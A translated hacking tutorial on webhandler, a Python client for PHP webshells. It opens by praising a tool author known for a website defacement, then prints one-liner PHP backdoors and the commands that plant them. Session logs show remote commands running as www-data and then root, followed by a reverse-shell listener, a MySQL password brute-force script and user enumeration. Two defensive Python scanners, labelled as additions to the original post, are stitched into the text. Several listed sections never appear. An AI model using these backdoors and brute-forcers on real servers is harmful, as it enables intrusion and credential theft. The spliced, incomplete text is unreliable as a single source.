A "Caidao" (China Chopper) for Linux: webhandler
Introduction
Usage
Installation
Client usage
GET submission
POST submission
Listener
Get system information
Brute-force MySQL
Brute-force FTP
View user groups
Download files
Execute local commands
Upload files
Reverse Msf TCP shell
References
Preface
Lesson 342 of the tutorial series. When it comes to Caidao, one has to mention its author: a veteran, born in a poor rural village, who reportedly never finished middle school and whose English is nothing special, yet who taught himself
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand/Helen_Sb/HOW/TO/MAKE/LOVE
and so on. Six or seven years ago, when * was pushing for independence, he left a defacement page reading "There is only one China" on the * and DPP websites, and became famous overnight.
The author is a plain, low-key technical expert who has released many tools over the years. China Chopper is his latest, built on top of his earlier WEBSHELL manager, and much more powerful.
You have seen very powerful ASP backdoors, very powerful PHP backdoors, very powerful ASPX backdoors, but have you seen a very powerful asp/aspx/php three-in-one backdoor? Probably not, and especially not one that is only a single line.
Shocking, isn't it? Unbelievable? Yes, when I first came across it I thought the same: could these three lines and an unknown "China Chopper" replace the hundreds of script backdoors for all kinds of platforms and environments that I had collected over several years? The facts proved me wrong: China Chopper not only replaces those backdoors, its functionality goes beyond what I imagined. I have not tried Caidao under Wine, so I do not know whether it runs on Linux, but there is a similar tool, webhandler, written in Python.
Introduction
It supports both POST and GET submission, but only PHP scripts on the target. The PHP one-liners it works with (what the author calls the "client" side):
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
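The three one-liners above share one shape: a request parameter is passed straight into a PHP command-execution function. The scanner below, an added defensive example that is not part of the original post or of webhandler, flags that shape in PHP source so a web root can be checked for it. The function list, the sample files and the `find_webshell_indicators`, `scan_files` and `scan_tree` names are my own assumptions. Note that the shell `echo '...'` commands used later on this page drop the inner single quotes, so the file actually written contains `$_GET[cmd]` without quotes; the pattern accepts both forms.

```python
import re
from pathlib import Path

# Shape shared by the one-liner shells shown on this page: a command-execution
# function whose argument is read directly from a request superglobal.
# The function list is an assumption (the page only shows system/passthru/exec).
WEBSHELL_RE = re.compile(
    r"\b(system|passthru|exec|shell_exec|popen|proc_open)\s*\(\s*"
    r"\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*['\"]?(\w+)['\"]?\s*\]",
    re.IGNORECASE,  # PHP function names are case-insensitive, so 'SYSTEM(' is valid too
)


def find_webshell_indicators(source):
    """Return one dict per match: line number, function, superglobal and parameter name."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in WEBSHELL_RE.finditer(line):
            hits.append({
                "line": lineno,
                "func": m.group(1).lower(),
                "source": "$_" + m.group(2).upper(),
                "param": m.group(3),
            })
    return hits


def scan_files(files):
    """Map file name -> indicators, keeping only files that have at least one."""
    result = {}
    for name, content in files.items():
        hits = find_webshell_indicators(content)
        if hits:
            result[name] = hits
    return result


def scan_tree(root):
    """Scan every *.php file under root on disk; returns {path: indicators}."""
    files = {}
    for p in Path(root).rglob("*.php"):
        try:
            files[str(p)] = p.read_text(errors="replace")
        except OSError:
            continue
    return scan_files(files)


# Constructed sample web root: the three shells from the page (get.php written the
# way the shell 'echo' command on this page actually writes it, without inner quotes)
# plus a benign script that uses both $_GET and system() legitimately.
SAMPLE_FILES = {
    "get.php": "<?php system($_GET[cmd]); ?>\n",
    "req.php": "<?php passthru($_REQUEST['cmd']); ?>\n",
    "post.php": "<?php echo exec($_POST['cmd']); ?>\n",
    "index.php": (
        "<?php\n"
        "$q = $_GET['q'];\n"
        "echo htmlspecialchars($q);\n"
        "system('ls -l /var/log');\n"
        "?>\n"
    ),
}

if __name__ == "__main__":
    for name, hits in scan_files(SAMPLE_FILES).items():
        for h in hits:
            print(f"{name}:{h['line']}: {h['func']}({h['source']}['{h['param']}'])")
```

The benign `index.php` is not flagged because its `system()` argument is a constant and its `$_GET` value never reaches an execution function; the check is on the data flow within one line, not on the presence of either token alone, which is what keeps the false-positive rate low on ordinary application code.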
Usage
Installation
root@Dis9Team:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip
root@Dis9Team:/pen/door# unzip webhandler.zip
root@Dis9Team:/pen/door# cd webhandler
root@Dis9Team:/pen/door/webhandler# apt-get install python-setuptools
root@Dis9Team:/pen/door/webhandler# easy_install argparse
Client usage
GET submission
root@ubuntu:/var/www# echo '<?php system($_GET['cmd']); ?>' > /var/www/get.php
Connect
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/get.php?cmd=
________ __ _______ __ __
| | | |.-----.| |--.| | |.---.-.-----.--| | |.-----.----.
| | | || -__|| _ || || _ | | _ | || -__| _|
|________||_____||_____||___|___||___._|__|__|_____|__||_____|__|
-------------------------------------------------------------------------
[!] "non-git". Keep up-to-date by running '--update'
-----------------------------------------------------------
User : www-data
ID : uid=33(www-data) gid=33(www-data) groups=33(www-data)
Kernel : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD : /var/www drwxrwxrwx
Uptime : 4 minutes
Target's IPs : 5.5.5.3
Our IP : 174.139.7.227
---------------------------------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
www-data@5.5.5.3:~(/var/www):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@5.5.5.3:~(/var/www):$
POST submission
root@ubuntu:/var/www# echo '<?php echo exec($_POST['cmd']); ?>' > post.php
Connect
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/post.php --method POST --parameter cmd
__ __ _ _ _ _ _
\ \ / / | | | | | | | | |
\ \ /\ / /__| |__ | |__| | __ _ _ __ __| | | ___ _ __
\ \/ \/ / _ \ '_ \| __ |/ _` | '_ \ / _` | |/ _ \ '__|
\ /\ / __/ |_) | | | | (_| | | | | (_| | | __/ |
\/ \/ \___|_.__/|_| |_|\__,_|_| |_|\__,_|_|\___|_|
-----------------------------------------------------------
[!] "non-git". Keep up-to-date by running '--update'
-----------------------
User : 5.5.5.3
ID : Unknown
Kernel : Unknown
CWD : Unknown Unknown
Uptime : Unknown
Target's IPs : Unknow
Our IP : 174.139.7.227
-----------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
5.5.5.3@Unknow:~(Unknown):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
5.5.5.3@Unknow:~(Unknown):$
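Both sessions above leave a trace on the web server side. The GET variant shows up in the access log as a request to a PHP file with a `cmd` query parameter; the POST variant (`--method POST --parameter cmd`) only reveals the script name and the method, because request bodies are not written to the access log. The parser below, an added example that is not part of the original post or of webhandler, runs over constructed combined-format log lines and reports the GET-style traffic. The log lines, the `SHELL_PARAMS` list and the function names are my own assumptions; the IP addresses are the ones shown in the banners above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format; the sample lines below were constructed to match it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names the one-liner shells on this page read from (assumed list).
SHELL_PARAMS = {"cmd"}


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return a reason string if the request looks like GET-style shell traffic, else None."""
    if not entry["path"].endswith(".php"):
        return None
    hit = SHELL_PARAMS & set(entry["query"])
    if not hit:
        return None
    param = sorted(hit)[0]
    value = entry["query"][param][0]
    return f"{param}={value!r}"


def find_suspicious(lines):
    """Return (source ip, path, reason) for every matching line, in log order."""
    found = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            found.append((entry["ip"], entry["path"], reason))
    return found


def count_by_source(hits):
    """Group hits per client IP so a single operator address stands out during triage."""
    counts = {}
    for ip, _path, _reason in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample log: two shell requests, one normal page view, one POST whose
# body is invisible here, and a static asset.
SAMPLE_LOG = """\
174.139.7.227 - - [19/Sep/2010:22:30:01 +0000] "GET /get.php?cmd=id HTTP/1.1" 200 58 "-" "-"
174.139.7.227 - - [19/Sep/2010:22:30:02 +0000] "GET /get.php?cmd=uname+-a HTTP/1.1" 200 112 "-" "-"
10.0.0.8 - - [19/Sep/2010:22:31:10 +0000] "GET /index.php?page=news&id=7 HTTP/1.1" 200 4821 "-" "-"
174.139.7.227 - - [19/Sep/2010:22:32:44 +0000] "POST /post.php HTTP/1.1" 200 58 "-" "-"
10.0.0.8 - - [19/Sep/2010:22:33:00 +0000] "GET /logo.png HTTP/1.1" 200 9432 "-" "-"
"""

if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG.splitlines())
    for ip, path, reason in hits:
        print(f"{ip} {path} {reason}")
    print(count_by_source(hits))
```

The POST line to `post.php` passes through unflagged, which is the point of the caveat: catching that form needs request-body visibility (a WAF or audit-logging module in front of PHP), or the file-content scan of the web root rather than the access log.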
Listener
Listen on a port first
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --listen 1234
[!] "non-git". Keep up-to-date by running '--update'
[i] Waiting on port: 1234
Then run a PHP reverse shell on the target to receive a shell.
Get system information
# root@5.5.5.3:~(/var/www):$ @info
----------------------------------------------------------
User : root
ID : uid=0(root) gid=0(root) groups=0(root)
Kernel : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD : /var/www drwxrwxrwx
Uptime : 11 minutes
Target's IPs : 5.5.5.3
Our IP : 174.139.7.227
--------------------------------------------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
root@5.5.5.3:~(/var/www):$
Brute-force MySQL
Default wordlist: modules/bruters/wordlist.txt, which the tool uploads automatically.
This is fairly process-hungry and single-threaded; use it with care.
Core code
#!/usr/bin/env php
<?php
error_reporting(0);
$host = "127.0.0.1";
$user_dict = "wordlist.txt";
$pass_dict = "wordlist.txt";
$userFile = file($user_dict);
$passFile = file($pass_dict);
$success = 0; // set to 1 once a valid credential pair is found
foreach ($userFile as $user) {
if ($success == 1) {
break;
}
foreach ($passFile as $pass) {
$user = trim($user);
$pass = trim($pass);
$connection = mysql_connect($host, $user, $pass);
if ($connection) {
echo "success:" . $user . ":" . $pass . "\n";
$success = 1;
mysql_close($connection);
break;
}
}
}
?>
Brute-force FTP
Same as above
5.5.5.3@Unknow:~(Unknown):$ @brute ftp
View user groups
5.5.5.3@Unknow:~(Unknown):$ @enum group
[+] Total number of groups: 1
-------------------------------------------------------
Group Name | Password | Group ID | Group List |
-------------------------------------------------------
honeyd | *In shadow* | 115 | |
-------------------------------------------------------
5.5.5.3@Unknow:~(Unknown):$ @enum passwd
[+] Total number of users: 1
----------------------------------
Username | Password | User ID | Group ID | User Info | Home Directory | Shell
----------------------------------------------------------------
b | *In shadow* | 1004 | 33 | | /dev/null | /usr/sbin/nologin
--------------------------------------------------------------
5.5.5.3@Unknow:~(Unknown):$
Looks like a honeypot, hahaha